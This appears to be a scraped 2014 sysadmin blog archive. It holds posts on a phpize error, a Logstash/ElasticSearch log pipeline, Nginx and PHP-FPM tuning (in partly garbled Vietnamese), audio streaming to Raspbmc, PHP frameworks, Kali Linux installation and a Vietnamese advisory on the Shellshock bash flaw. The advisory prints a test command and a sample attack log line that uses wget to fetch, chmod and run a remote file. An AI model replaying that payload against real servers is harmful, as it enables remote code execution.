khanhnnvn

phpize – Cannot find autoconf. Please check your autoconf installation and the $PHP_AUTOCONF environment variable. Then, rerun this script.

 Linux  Comments Off on phpize – Cannot find autoconf. Please check your autoconf installation and the $PHP_AUTOCONF environment variable. Then, rerun this script.
Oct 102014
 

You may get the below error :


# phpize
Configuring for:
PHP Api Version:         20090626
Zend Module Api No:      20090626
Zend Extension Api No:   220090626
Cannot find autoconf. Please check your autoconf installation and the
$PHP_AUTOCONF environment variable. Then, rerun this script.

Solution: 
# yum install autoconf
Re-run the “phpsize” command, the issue will fix.
# phpize
Configuring for:
PHP Api Version:         20090626
Zend Module Api No:      20090626
Zend Extension Api No:   220090626

Centralized Logs Management with Logtash, ElasticSearch, and Redis

 Monitoring, Solution  Comments Off on Centralized Logs Management with Logtash, ElasticSearch, and Redis
Oct 082014
 

Deploying a Centralized Logs Management System seems very easy these days with such these great tools:

+ Logtash: collect logs, index logs, process logs, and ship logs
+ Redis: receive logs from logs shippers
+ ElasticSearch: store logs
+ Kibana: web interface with graphs, tables…

We will implement the logs management system as the following architecture:




In  this tutorial, I only deploy one shipper (nginx logs of my Django app) on one machine, and one server to play as logs indexer (redis, logstash, elasticsearch, kibana):


1. On the indexer server, install and run Redis

http://iambusychangingtheworld.blogspot.com/2013/11/install-redis-and-run-as-service.html

2. On the indexer server, install and run ElasticSearch:

$ sudo aptitude install openjdk-6-jre
$ wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.7.deb
$ sudo dpkg -i elasticsearch


3. On the indexer server, download, create config and run Logtash to get log from Redis and store them to ElasticSearch:

+ Download Logtash:

$ sudo mkdir /opt/logstash /etc/logstash
$ sudo cd /opt/logstash
$ sudo wget https://download.elasticsearch.org/logstash/logstash/logstash-1.2.2-flatjar.jar


+ Create Logtash config file /etc/logstash/logstash-indexer.conf with the following content:

input {
        redis {
                host => “127.0.0.1”
                data_type => “list”
                key => “logstash”
                codec => json
        }
}
output {
        elasticsearch {
                embedded => true
        }
}


+ Run Logstash, this will also activate the Kibana web interface on port 9292:

$ java -jar /opt/logstash/logstash-1.2.2-flatjar.jar agent -f /etc/logstash/logstash-indexer.conf — web


 4. On the shipper machine (my computer), download Logstash, and create config file for Logtash to copy my Django app’s logs to the indexer server:

+ Download Logstash:

$ sudo mkdir /opt/logstash /etc/logstash
$ sudo cd /opt/logstash
$ sudo wget https://download.elasticsearch.org/logstash/logstash/logstash-1.2.2-flatjar.jar

+ Create a config file at /etc/logstash/logstash-shipper.conf for Logstash to copy logs file redis at the indexer server:

input {
        file {
                path => “/home/projects/logs/*ecap.log”
                type => “nginx”
        }
}
output {
        redis {
                host => “indexer.server.ip”
                data_type => “list”
                key => “logstash”
        }
}



+ Run Logstash:

$ java -jar /opt/logstash/logstash-1.2.2-flatjar.jar agent -f /etc/logstash/logstash-shipper.conf


5. From a random machine on my network, open browser to access the kibana web interface to manage all the logs:




From now on, If I want to monitor any services’s logs, I just need to run a Logstash instance on the server which runs that service.


But, there is one annoying thing: the CPU usages on the indexer server is very high. It’s because I’m running all the services (logstash, redis, elasticsearch, kibana) on a same server, and the java processes consume a lot of CPU. Look at the following htop screenshots and you will see:

  • Indexer server, before running all the services:



  • Indexer server, after running all the services:




These are all listening ports on the indexer server:


Some tuning on ElasticSearch maybe helpful. http://jablonskis.org/2013/elasticsearch-and-logstash-tuning/




References:
[0] http://michael.bouvy.net/blog/en/2013/11/19/collect-visualize-your-logs-logstash-elasticsearch-redis-kibana/
[1] http://logstash.net/docs/1.2.2/tutorials/getting-started-centralized
[2] http://logstash.net/docs/1.2.2/tutorials/10-minute-walkthrough/

Tối ưu Nginx

 Nginx  Comments Off on Tối ưu Nginx
Oct 032014
 

I – Tối ưu Nginx:
1) B trí li các tp tin cu hình:
Thông thưng thì các tp tin cu hình ca Nginx s đưc lưu tr trong thư mc /etc/nginx. Mt cách t chc li vic lưu tr  tt hơn theo phong cách ca Apache như sau
## Tp tin cu hình chính ##/etc/nginx/nginx.conf## Tp tin cu hình các virtual host ##/etc/nginx/sites-available//etc/nginx/sites-enabled/ ## Các tp tin cu hình khác… ##/etc/nginx/conf.d/
Phn tp tin cu hình virtual host s có 2 thư mc chính:
  • sites-available: Cha danh sách các file cu hình khác nhau như: file cu hình hoàn chnh, file cu hình tm thi, file cu hình li,Lưu tr nhng tp tin cu hình mà ta hin có.
  • sites-enabled: Cha danh sách các symbolic link tr ti các tp tin cu hình hoàn chnh, đã ti ưu thư mc sites-available.
Vì chúng ta tách bit phn file cu hình ca các virtual host ra lưu tr riêng nên ta cn phi include dòng đa ch thư mc lưu tr các file cu hình này vào file cu hình chính. filenginx.conf ta thêm vào
## Tp tin cu hình virtual host. ##include /etc/nginx/sites-enabled/*; ## Các tp tin cu hình khác…/ ##include /etc/nginx/conf.d/*;
Chú ý: Vic ti ưu li cách sp xếp này giúp chúng ta ddàng qun lý h thng webserver hơn chkhông có tác dng ti hiu sut ti hiu sut.
2) Ti ưu worker_processes:
Vi cu hình mc đnh, Nginx s s dng mt CPU đ x lý các tác v ca mình. Tùy theo mc đ hot đng ca web server mà chúng ta có th thay đi li thiết lp này. Ví d vi các web server hay sdng v SSL, gzip thì ta nên đt ch s cworker_processes này lên cao hơn. Nếu website ca bn có sng các tp tin tĩnh nhiu, và dung lưng ca chúng ln hơn b nh RAM thì vic tăng worker_processes s ti ưu băng thông đĩa ca h thng.
Đ xác đnh s cores ca CPU ca h thng ta có th thc hin lnh
# cat /proc/cpuinfo | grep processor
[root@server ~]# cat /proc/cpuinfo | grep processorprocessor    : 0processor    : 1processor    : 2processor    : 3
Như trên, CPU ca chúng ta có 4 cores. Đ thay đi mc s dng CPU ca nginx ta sa tp tin cu hình chính
# vi /etc/nginx/nginx.conf
Ti dòng s 3 ta thay đi giá tr cworker_processes là 4.
nginx-php-fpm-config-2
3) Ti ưu worker_connections:
worker_connections s cho biết sng connection mà CPU s x lý. Mc đnh, sng connection này đưc thiết lp là 1024. Đ xem v mc gii hn s dng ca h thng bn có th dng lnh ulimit
# ulimit –n
nginx-php-fpm-config-3
Con s thiết lp cworker_connections nên nh hơn hoc bng gii hn này!
Nếu bn đã điu chnh li giá tr worker_processes giúp Nginx s dng nhiu cores đ x lý các tác v hơn thì có th thêm dòng cu hình sau đ tăng sng clients lên cao nht
max_clients = worker_processes * worker_connections
4) Ti ưu buffers (b nh đm):
Mt trong nhng cu hình quan trng đ ti ưu Nginx là thiết đt các giá tr buffer. Nếu bn thiết lp b nh buffer quá nh thì s d dn ti tình trng tht c chai khi web server ca chúng ta tiếp nhn mt lưng traffic ln. Đ thay đi các giá tr buffer này, chúng ta có th thêm vào các dòng cu hình th http ca file cu hình chính nginx.conf
clien
t_body_buffer_size 8K; client_header_buffer_size 1k; client_max_body_size 2m; large_client_header_buffers 2 1k;
Trong đó:
  • client_body_buffer_size: Thiết đt giá tr kích thưc ca body mà client yêu cu. Nếu kích thưc đưc yêu cu ln hơn giá tr buffer thì s đưc lưu vào temporary file.
  • client_header_buffer_size: Thiết đt giá tr kích thưc ca header mà client yêu cu. Thông thưng thì kích thưc này 1K là đ.
  • client_max_body_size: Thiết đt giá tr kích thưc ti đa ca body mà client có th yêu cu đưc, xác đnh bi dòng Conent-Length trong header. Nếu kích thưc body yêu cu vưt gii hn nãy thì client s nhn đưc thông báo li “Request Entity Too Large” (413).
  • large_client_header_buffers: Thiết đt giá tr kích v sng và kích thưc ln nht ca buffer dùng đ đc các headers có kích thưc ln t các request ca client. Nếu client gi mt header quá ln Nginx s tr v li Request URL too large (414) hoc Bad request (400) nếu header ca request quá dài.
Ngoài ra chúng ta cũng cn thiết đt li các giá tr timeout đ ti ưu hiu sut hot đng ca web server vi các client
client_body_timeout     10; client_header_timeout   10; keepalive_timeout       15; send_timeout            10;
Trong đó:
  • client_body_timeout: Thiết đt thi gian ti body ca webpage t client. Nếu quá thi gian này, client s nhn thông báo tr v “Request time out” (408).
  • client_header_timeout: Thiết đt thi gian ti title ca webpage t client. Nếu quá thi gian này, client s nhn thông báo tr v “Request time out” (408).
  • keepalive_timeout: Thiết đt thi gian sng ca kết ni t client, nếu quá thi gian này thì kết ni s b đóng.
  • send_timeout: Thiết đt thi gian phn hi d liu gia client và server, nếu quá thi gian này thì nginx s tt kết ni.
5) Tt Access Logs:
Mc đnh thì Nginx s ghi li các request lên mt file trên đĩa cng như là mt vic ghi logs. Nêu bn không s dng các access logs thì bn có th tt tính năng này đi đ gim bt thi gian nhp xut. Đ thc hin điu này, trong th server ca file cu hình chính nginx.conf bn có th đt giá tr sau
access_logs off;
6) Nén các gói d liu gi đi bng Gzip
Gzip s giúp nén các d liu trưc khi chuyn chúng ti Client. Đây là mt cách đ tăng tc đ tuy cp website ca cúng ta. Trong th http ca file cu hình chính nginx.conf  ta có th thêm
gzip              on;gzip_comp_level   2;gzip_min_length   1000;gzip_proxied      expired no-cache no-store private auth;gzip_types        text/plain application/xml;gzip_disable      “MSIE [1-6].”;
7) Cache ni dung các tp tin tĩnh:
Hu hết các request t client ti website ca chúng ta đ load các nôi dung như: hình nh, java script, css, flash, Chúng ta nên thc hin vic lưu cache li các tp tin có ni dung tĩnh này trên Nginx
location ~* “.(js|ico|gif|jpg|png|css|html|htm|swf|htc|xml|bmp|cur)$” {    root            /home/site/public_html;    add_header      Pragma “public”;    add_header      Cache-Control “public”;    expires         3M;    access_log      off;    log_not_found   off;}
8) n phiên bn ca Nginx:
Vic n đi phiên bn ca Nginx t Server Header s giúp h thng webserver ca chúng ta đưc bo mt tt hơn. Đ thc hin điu này, trong th http ca ca tp tin cu hình chínhnginx.conf ta thêm vào dòng sau
server_tokens off;
9) Thc thi các tp tin PHP thông qua PHP-FPM:
đây ta có th s dng TCP/IP stack mc đnh hoc dùng tr tiếp Unix Socket Connection. Chúng ta cũng có th s dng PHP-FPM đ lng nghe trên IP:Port (thưng là 127.0.0.1:9000).
location ~* .php$ {    try_files       $uri /index.php;    fastcgi_index   index.php;    fastcgi_pass    127.0.0.1:9000;    #fastcgi_pass   unix:/var/run/php-fpm/php-fpm.sock;    include         fastcgi_params;    fastcgi_param   SCRIPT_FILENAME    $document_root$fastcgi_script_name;    fastcgi_param   SCRIPT_NAME        $fastcgi_script_name;}
Chúng ta hoàn toàn có th tách bit PHP-FPM và Nginx chy trên các server khác nhau.
10) Cm các truy cp ti các tp tin n trên Nginx:
Đôi khi trên các thư mc web chúng ta có lưu nhng tp tin n (bt đu vi du chm .”) như .svn, .htaccess. Đây là các tp tin không mang tính  public đi vi ngưi dùng. Đ ngăn chn các truy xut ti các tp tin n này ta có th thêm vào đon cu hình sau
location ~ /. {    access_log off;    log_not_found off;     deny all;}
II – Tối ưu PHP-FPM
1) B trí li các tp tin cu hình:
Thông thưng thì các cu hình ca PHP-FPM đưc thiết lp trong file cu hình /etc/php-fpm.conf và thư m/etc/php-fpm.d. Các tp tin cu hình khác ca PHP-FPM nên đt trong cùng thư mc/etc/php-fpm.d. Chúng ta có th thêm dòng cu hình sau vào file php-fpm.conf đ thc hin điu này
include=/etc/php-fpm.d/*.conf
2) Cu hình nhiu PHP-FPM Pool:
Đi vi PHP-FPM ta có th to ra nhiu pool khác nhau cho các website khác nhau có trên web server. Bng cách này chúng ta có th có đưc các cu hình cp phát tài nguyên và nhóm s hu khác nhau đi vi tn website. Ví d đây mình to 3 pool cho 3 website khác nhau là
/etc/php-fpm.d/site.conf
/etc/php-fpm.d/blog.conf
/etc/php-fpm.d/forums.conf
Các cu hình mu:
/etc/php-fpm.d/site.conf
[site]listen = 127.0.0.1:9000user = sitegroup = siterequest_slowlog_timeout = 5sslowlog = /var/log/php-fpm/slowlog-site.loglisten.allowed_clients = 127.0.0.1pm = dynamicpm.max_children = 5pm.start_servers = 3pm.min_spare_servers = 2pm.max_spare_servers = 4pm.max_requests = 200listen.backlog = -1pm.status_path = /statusrequest_terminate_timeout = 120srlimit_files = 131072rlimit_core = unlimitedcatch_workers_output = yesenv[HOSTNAME] = $HOSTNAMEenv[TMP] = /tmpenv[TMPDIR] = /tmpenv[TEMP] = /tmp
/etc/php-fpm.d/blog.conf
[blog]listen = 127.0.0.1:9001user = bloggroup = blogrequest_slowlog_timeout = 5sslowlog = /var/log/php-fpm/slowlog-blog.loglisten.allowed_clients = 127.0.0.1pm = dynamicpm.max_children = 4pm.start_servers = 2pm.min_spare_servers = 1pm.max_spare_servers = 3pm.max_requests = 200listen.backlog = -1pm.status_path = /statusrequest_terminate_timeout = 120srlimit_files = 131072rlimit_core = unlimitedcatch_workers_output = yesenv[HOSTNAME] = $HOSTNAMEenv[TMP] = /tmpenv[TMPDIR] = /tmpenv[TEMP] = /tmp
/etc/php-fpm.d/forums.conf
[forums]listen = 127.0.0.1:9002user = forumsgroup = forumsrequest_slowlog_timeout = 5sslowlog = /var/log/php-fpm/slowlog-forums.loglisten.allowed_clients = 127.0.0.1pm = dynamicpm.max_children = 10pm.start_servers = 3pm.min_spare_servers = 2pm.max_spare_servers = 4pm.max_requests = 400listen.backlog = -1pm.status_path = /statusrequest_terminate_timeout = 120srlimit_files = 131072rlimit_core = unlimitedcatch_workers_output = yesenv[HOSTNAME] = $HOSTNAMEenv[TMP] = /tmpenv[TMPDIR] = /tmpenv[TEMP] = /tmp
3) Cu hình PHP-FPM Pool Process Manager (pm):
Trong vic qun lý các tiến trình ca PHP-FPM ta nên s dng cách qun lý đng đ ch khi đng nhng tiến trình khi cn thiết. Các cu hình đây cũng tương t như là cu hình các thông s ca worker_porcess và worker_connection ca Nginx mà mình đã trình bày trên. Tùy theo lưng truy cp ti website ca chúng ta và dung lưng b nh RAM ca web server hin có mà ta có các cách cu hình cho phù hp.
Gii s Web Server ca chúng ta có 512 MB ram, nhng lúc website có lưng truy cp cao, ta check dung lưng b nh RAM hin đang dùng (bng lnh top chn hn). Dung lưng RAM đưc cp phát cho PHP-FPM là 220 MB, mi tiến trình ca nó s dng 24 MB. Ta có thtính đưc giá tr cmax_children là 220/24 = 9.17.
Vy giá tr pm.max_children ta nên thiết đt cho web server là 9.
Trong file cu hình pool ca website ta có th có cu hình mu như sau:
pm.max_children = 9pm.start_servers = 3pm.min_spare_servers = 2pm.max_spare_servers = 4pm.max_requests = 200
Mc đnh thì sng request mi tiến trình là không b gii hn. Tuy nhiên ta nên thiết đt li nó mt giá tr xác đnh đ tránh các vn đ v b nh. Như ví d trên pm.max_requestsđưc gán giá tr là 200.

Streaming Audio From Linux to Raspbmc

 Solution  Comments Off on Streaming Audio From Linux to Raspbmc
Sep 292014
 
Early in 2014, I finally got around to turning my Raspberry Pi in to a little XMBC media centre by installing Raspbmc. Which was fun. And also easy.
Perhaps a little too easy: I’m a bit of a nerd, so it didn’t take long to get bored of just playing regular type media off the external hard drive. Part of the reason I have a Raspberry Pi, is for the fun of thinking of what relatively useless thing I might potentially do with it next, and then spending (wasting?) many hours trying to do it.
So, as I was trying to decide what to do next, I considered the fact that I fairly often like to play music on my PC while I’m working. And my sound system is now hooked up to the Raspberry Pi. So it would be most convenient if I could just deliver the sound across my network for Raspbmc to play for me. I was running Ubuntu 13.10 – Saucy Salamander – at the time.
This turned out to be a lot harder than you might imagine. Excellent. (Disclaimer: this was in 2014 – I suppose it might be easier now … if so, I apologise for the convenience).

Option 1: PulseAudio Network Streaming

Ubuntu uses PulseAudio by default for soundy things. So that is where I started my quest. If you pop open paprefs (installing it first, if it’s not there), you will notice that it claims to be able to do things over a network.
paprefs-network
Here is a link to the incomprehensible documentation about it:  NetworkSetup. At least, it was incomprehensible when I first read it. It now makes a little bit more sense – but I assume that you are at the start of your journey if you are even reading this – so it probably won’t make much sense to you. Alternatively you could have a read of this blog that claims to make network audio with PulseAudio (somewhat) easy.
However, I decided to abandon this idea:
  1. Raspbmc doesn’t install with PulseAudio by default – and you would need it to be running in server mode – and at time of writing the people of the internet seemed to be having some trouble getting them to play together.
  2. I wanted something that was more integrated with the XMBC user interface – rather than just something running in parallel.

Option 2: Apple AirPlay

Perhaps, like me, you noticed that paprefs has greyed-out option: “Make discoverable Apple AirTunes sound devices available locally”. That is interesting. Especially since you can set your XMBC up to be a target for Apple AirPlay sources – making it look like a set of AirPlay speakers to any iDevices on your network.  I tested it out with an iPod Touch – and it worked really nicely.
xbmc-airplay
But how to get that option un-greyed-out? The internet suggested the following (might have been nice for paprefs to give me a hint):
sudo apt-get install pulseaudio-module-raop
Now you can try it out:
paprefs-airplay
This will add a new audio device that you can select from your Sound Settings page, with the name of your XMBC. However, if you are like me, you may discover that it it does not work. At all. Except to produce a stream of nasty, choppy, ear-burning noise.
You might even be persistent and try out Pulseaudio-raop2. In which case, if you are like me, you will discover that it, too, does not work, and also crashes quite a lot (which is fair – since it is experimental).

Option 3: Multicast/RTP

I put this in for completeness sake. I didn’t get very far in investigating it as an option. I did a couple of experiments trying to get it to work between two Linux PCs before attempting it with the Raspberry Pi and was getting very choppy sound – so abandoned it and moved on.

Option 4: DLNA/UPnP

My final, and successful(!),  attempt involved DLNA/UPnP media streaming. On the paprefsNetwork Server tab was another greyed-outed option “Make local sound devices available as DLNA/UPnp Media Server”.
But how to get it un-greyed-out? The internet suggested the following (might have been nice forpaprefs to give me a hint):
sudo apt-get install rygel
paprefs-upnp
This too adds a new audio device that you can select:
sound-settings
Now go to your XBMC File Manager and look for a new UPnP device to add as a Source:
xbmc-upnp-browse
Unfortunately, you are likely to find  nothing there.
Hmm.
Turns out that you have two problems:
  1. Rygel isn’t running – you need to start it manually from a shell (rygel), or set up init scripts yourself (I didn’t bother);
  2. Rygel needs to be configured to actually publish PulseAudio’s stream using ‘GstLaunch‘. Obviously.
To configure Rygel, you’ll need to edit one of its configuration files. Rygel can be configuredglobally (/etc/rygel.conf) or per-user ($HOME/.config/rygel.conf). I just edited the global one.
Find the GstLaunch section, and add some config like this* (in my default install it was disabled):
[GstLaunch]
enabled=true
launch-items=mypulseaudiosink
mypulseaudiosink-title=Audio on @HOSTNAME@
mypulseaudiosink-mime=audio/flac
mypulseaudiosink-launch=pulsesrc device=upnp.monitor ! flacenc
* Courtesy of dpc’s blog.
That setup gets Rygel to publish a new stream called ‘GstLaunch/Audio on <my pc>’. The stream will be publishing whatever sound is produced by the PulseAudio ‘upnp.monitor’ source – which is what all of those paprefs settings were actually enabling. It will also transcode that audio stream to FLAC, which is lossless, but also compressed enough to work fine over my WiFi without causing trouble – and with only a couple of seconds of buffering required on the other end.
Now you can add the GstLaunch item as a source through your XMBC File Manager:
xbmc-upnp-finding-gstlaunch
Now you are able select your PC’s audio as a stream and connect to it:
my-audio
Finally, your XBMC is playing your PC’s audio through your sound system. Hooray!
my-audio-playing
http://westmarch.sjsoft.com/

Những điều cần biết về lỗ hổng nguy hiểm trong “bash” (CVE-2014-6271)

 Security  Comments Off on Những điều cần biết về lỗ hổng nguy hiểm trong “bash” (CVE-2014-6271)
Sep 282014
 

Lỗ hổng bảo mật “bash” (CVE-2014-6271) là gì?

Lỗ hổng bảo mật “bash” được mô tả với mã CVE-2014-6271 là một lỗ hổng vô cùng nguy hiểm do có tầm ảnh hưởng lớn và dễ dàng khai thác. Tin tặc có thể dễ dàng thực hiện các lệnh của hệ thống cùng quyền của dịch vụ bị khai thác.
Trong hầu hết các vụ bị khai thác bởi lỗ hổng trên Internet hiện nay, tin tặc điều khiển các cuộc tấn công vào máy chủ trang web từ xa lưu trữ CGI script được viết trong bash.
Tại thời điểm của bài viết này, lỗ hổng đã được sử dụng cho những mục đích lừa đảo – lây nhiễm trên các máy chủ dễ bị tổn thương với mã độc và trong các cuộc tấn công của tin tặc. Các nhà nghiên cứu liên tục thu thập mẫu mới và những dấu hiệu bị lây nhiễm thông qua lỗ hổng này; thông tin cụ thể về loại này sẽ được công bố sớm.
Điều quan trọng cần hiểu là lỗ hổng này không bị rằng buộc bởi một dịch vụ cụ thể nào cả, ví dụ Apache hoặc nginx. Thay vào đó, nó nằm trong trình thông dịch bash shell, cho phép tin tặc thêm các lệnh hệ thống vào các biến môi trường mà bash sử dụng.

Lỗ hổng “bash” hoạt động như thế nào?

Chúng tôi lấy ví dụ tương tự như chúng ta đã được thấy trong các khuyến cào và các code POC khai thác được đăng tải nhằm giải thích cách thức hoạt động của lỗ hổng. Khi bạn có một CGI script trên máy chủ web, scritp này sẽ tự động đọc các biến môi trường nhất định, ví dụ như địa chỉ IP của bạn, phiên bản trình duyệt web và thông tin về local system.
Nhưng hãy tưởng tượng rằng bạn không chỉ vượt qua được thông tin bình thường của hệ thống với CGI script, bạn còn có thể dùng để chạy các lệnh ở cấp độ cao hơn của hệ thống. Điều đó có nghĩa là không cần bất cứ thông tin xác thực nào trên webserver, chỉ cần truy cập vào CGI script bạn có thể đọc được các biến môi trường này và những biến môi trường đó bao gồm cả những chuỗi thông tin có thể bị khai thác và thực thi lệnh mà bạn chỉ định trên máy chủ.

Điều khiến lỗ hổng trở nên độc đáo và nguy hiểm?

Lỗ hổng trở nên nguy hiểm bởi nó rất dễ dàng khai thác – nhất là khi số lượng đối tượng đang tồn tại lỗ hổng này là rất nhiều. Nó không chỉ ảnh hưởng đến máy chủ web mà còn ảnh hưởng đến bất kì phần mềm nào sử dụng thông dịch bash và đọc các dữ liệu của bạn.
Các nhà nghiên cứu vẫn đang cố gắng tìm hiểu xem các trình thông dịch như PHP, JSP, Python hay Perl có bị ảnh hưởng hay không. Dựa vào code được viết, đôi khi một trình thông dịch lại sử dụng bash để chạy những hàm nhất đinh; và trong trường hợp này rất có thể các trình thông dịch khác cũng bị lỗ hổng CVE-2014-6271.
Tác động của nó là rất lớn vì rất nhiều thiết bị nhúng có sử dụng CGI script – ví dụ như router, đồ gia dụng, wireless access point. Trong nhiều trường hợp rất khó để vá lỗ hổng này.

Mức độ phổ biến của lỗ hổng?

Rất khó để đưa ra được mức độ lan rộng của nó nhưng theo các chuyên gia từ Kaspersky cho biết ngay sau khi lỗ hổng được công bố, rất nhiều người đã phát triển công cụ khai thác và lây nhiễm các virus liên quan – cả hacker mũ đen và hacker mũ trắng đều tìm kiếm trên Internet những máy chủ dễ bị tổn thương bởi lỗ hổng. Có rất nhiều công cụ khai thác đang được phát triển nhắm đến local file và network daemon. Cũng có nhiều cuộc thảo luận liên quan đến OpenSSH và DHCP-Clines bị tổn thương trước kiểu tấn công này.

Cách kiểm tra hệ thống/trang web có bị ảnh hưởng hay không?

Cách đơn giản nhất để kiểm tra hệ thống của bạn có bị tổn thương hay không là mở một bash-shell trên hệ thống và thực thi lệnh sau

"env x='() { :;}; echo vulnerable' bash  -c "echo this is a test"

Nếu shell trả về chuỗi “vulnerable” thì bạn nên cập nhật lại hệ thống của mình. Ngoài ra còn có các công cụ khác để kiểm tra lỗ hổng này bằng cách thử khai thác vào hệ thống của bạn.

Lời khuyên về việc vá lỗ hổng ?

Việc đầu tiên mà bạn cần làm là cập nhật phiên bản bash của bạn. Các bản phân phối khác nhau từ Linux được cung cấp các bản vá lỗi cho lỗ hổng này nhưng không phải tất cả bản vá đều được chứng minh là thực sự hiệu quả, đó chỉ là bước đầu tiên cần làm.
Nếu bạn sử dụng bất kì IDS/IPS nào, chúng tôi khuyên bạn nên add/load một signature cho nó. Rất nhiều public rule đã được đăng tải. Ngoài ra xem xét lại cấu hình máy chủ web của bạn. Nếu có bất kì CGI script nào thì hãy vô hiệu hóa chúng.

Đây có phải là mối đe dọa đến các ngân hàng trực tuyến?

Lỗ hổng này được khai thác nhắm đến mục tiêu là các máy chủ lưu trữ trên Internet. Ngay cả một số workstation chạy Linux và OSX cũng bị ảnh hưởng, nhưng tin tặc sẽ cần p
hải tìm ra phương thức tấn công mới có thể khai thác từ xa trên máy tính của bạn.

Lỗ hổng này không nhắm đến mục tiêu cá nhân mà là máy chủ trên Internet. Nhưng cũng có nghĩa là nếu trang web của công ty thương mại điện tử hay ngân hàng mà bạn sử dụng bị tấn công thì về mặt lí thuyết thông tin cá nhân của bạn cũng sẽ bị xâm hại. Vào thời điểm của bài viết này, khó có thể nói được chính xác nền tảng nào sẽ bị tổn thương và trở thành mục tiêu tấn công, nhưng chúng tôi khuyên bạn không nên kích hoạt thẻ tín dụng hay chia sẻ những thông tin nhạy cảm trong những ngày sắp tới, đến khi các nhà nghiên cứu bảo mật có thể tìm ra nhiều thông tin hơn về tình huống này.

Có thể phát hiện được nếu ai đó đang khai thác lỗ hổng này không?

Chúng tôi khuyến cáo bạn nên xem xét lại HTTP log và kiểm tra xem bất kì thứ gì khả nghi. Ví dụ về một mẫu mã độc

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0"  400 349 "() { :; }; 
wget -O /tmp/besh http://192.168.1.1/filename; chmod 777  /tmp/besh; /tmp/besh;"

Ngoài ra còn một số bản vá cho bash có thể ghi lại dòng lệnh được kiểm duyệt thông qua trình thông dịch bash. Đó là một cách hữu hiệu để tìm ra ai đó đang khai thác thiết bị của bạn. Nó không thể ngăn chặn được tin tặc nhưng có thể ghi chép lại hoạt động của chúng trên hệ thống.

Mối đe dọa này nghiêm trọng như thế nào?

Lỗ hổng này thực sự nguy hiểm, nhưng không phải mọi hệ thống đều bị tổn thương. Phải trong những điều kiện cụ thể, ví dụ cho một máy chủ đang sử dụng các dịch vụ có thể bị khai thác. Một vấn đề lớn nhất hiện nay là khi các bản vá được công khai, các nhà nghiên cứu sẽ tìm ra cách để khai thác bash, tìm ra những điều kiện khác cho phép khai thác bash v.v . Những bản vá có thể giúp ngăn chặn thực thi mã độc nhưng không thể làm gì được với một file ghi đè lên. Vì vậy có thể sẽ có một loạt các bản vá lỗi liên tục cho bash.

Đây có phải loại  Heartbleed mới?

Nó dễ dàng cho tin tặc khai thác hơn Heartbleed. Trong trường hợp của Heartbleed, tin tặc có thể ăn cắp dữ liệu từ bộ nhớ, tìm những thông tin đáng quan tâm trong đó. Ngược lại, lỗ hổng bash có thể khiến tin tặc điều khiển toàn bộ hệ thống. Do đó nó có vẻ nguy hiểm hơn Heartbleed.

Nó có thể được sử dụng trong các cuộc tấn công APT trong tương lai?

Nó có thể được dùng như một mã độc tự động để kiểm tra thiết bị tồn tại bug hay không, lây lan trên hệ thống và tấn công theo một cách nào đó.

Theo securitydaily.net

Top 10 PHP frameworks for 2014

 Programing  Comments Off on Top 10 PHP frameworks for 2014
Sep 282014
 
PHP frameworks are super useful tools when it comes to clean and structured web development, as they speed up the creation and maintenance of your PHP web applications. In this article, I have compiled (in no particular order) my 10 favorite PHP frameworks.

Laravel


Probably the most popular PHP framework right now. Laravel is powerful and elegant while still being easy to learn and use. Definitely worth giving a try!
 More info/download

Flight


Flight is a fast, simple, extensible micro framework for PHP which enables you to quickly and easily build RESTful web applications. Easy to use and to learn, simple yet powerful.
 More info/download

Yii


Yii is a high-performance PHP framework for developing Web 2.0 applications. Yii comes with rich features: MVC, DAO/ActiveRecord, I18N/L10N, caching, authentication and role-based access control, scaffolding, testing, etc.
 More info/download

Medoo


Medoo is the lightest PHP database
as it consists of only one file of 10,9kb. A great micro framework for small and simple applications.
 More info/download

PHPixie


Originally a fork of the Kohana framework, PHPixie is among my favorite new frameworks: MVC compliant, fast to learn, powerful. You should try it sometime soon!
 More info/download

CodeIgniter


Although being a bit old and reaching the end of its life, I definitely love CI which is a great MVC framework. I’ve used it countless times on many project and I never was disappointed.
 More info/download

Kohana


Kohana is an open source, object oriented MVC web framework built using PHP5 by a team of volunteers that aims to be swift, secure, and small.
 More info/download

Symfony


Created in 2005, Symfony is a very powerful MVC framework and is quite popular in the enterprise world. It was heavily inspired by other Web Application Frameworks such as Ruby On Rails, Django, and Spring. Symfony is probably one of the most complete PHP frameworks.
 More info/download

Pop PHP


While some PHP frameworks are pretty complex and intense, Pop has been built with all experience levels in mind. Pop has a manageable learning curve to help beginners get their feet wet with a PHP framework, but also offers robust and powerful features for the more advanced PHP developer.
 More info/download

Phalcon


Phalcon is an open source, full stack framework for PHP 5 written as a C-extension, optimized for high performance. You don’t need to learn or use the C language, since the functionality is exposed as PHP classes ready for you to use. Phalcon also is loosely coupled, allowing you to use its objects as glue components based on the needs of your application.
 More info/download

Ethical Hacking with Kali Linux Part-1

 Linux, Pentest, Security  Comments Off on Ethical Hacking with Kali Linux Part-1
Sep 262014
 

Ethical Hacking Course Part-1 Kali Linux Introduction & Installation

URL: http://kungfuhacking.blogspot.in

What is Kali Linux?
  • Kali Linux is the most preferred operating system for professionals.
  • Kali is an advanced Linux-based operating system, a collection of open source software that is used to perform different tasks within penetration testing, computer forensics, and security audits. 
  •  Kali Linux contains over 300 penetration testing and assessment tools.
  • Kali supports a variety of additional hardware such as wireless receivers and PCI hardware. 
  • It provides a full-fledged development environment in C, Python, and Ruby.
  • It is customizable and open source.
  • Kali comes as a downloadable ISO that can either be used as a live or a  standalone operating system. 





Kali Linux Installation:-
  • To begin the installation, we need to download Kali Linux. Kali Linux is available in the following formats: 

          ISO files based on system architecture (x86 and x64)

    VMware images 


    ARM images

  • Kali can be either installed as a dual boot with your existing operating system, or it can be set up as a virtual machine. Let us begin the process of dual boot installation first. In three easy steps, you can install Kali Linux on your system as a dual boot option.

Step 1 – Download and Boot:- 

  • Before you install Kali, you will need to check whether you have all of the following required elements:



                        Minimum 12 GB of hardware space
                        At least 1 GB RAM for optimum performance
                        Bootable device such as an optical drive or USB.

  •  Once you have checked the requirements, you can download a bootable ISO from its official website,  http://www.kali.org/downloads/
  • Once the download is complete, we will have to burn it to a disk or USB. The disk/USB should be made bootable so that the system can load the setup from it.


Step 2 – Setting the Dual Boot:-


  •   Once our bootable media are ready, we are set to restart the system and boot from our disk/USB. 
  • We will begin by selecting the Live boot option. The operating system will start loading and, within a few minutes, we will have our first look at the Kali desktop.
  • Once the desktop is loaded, navigate to Applications | System Tools | Administration | GParted Partition editor. 
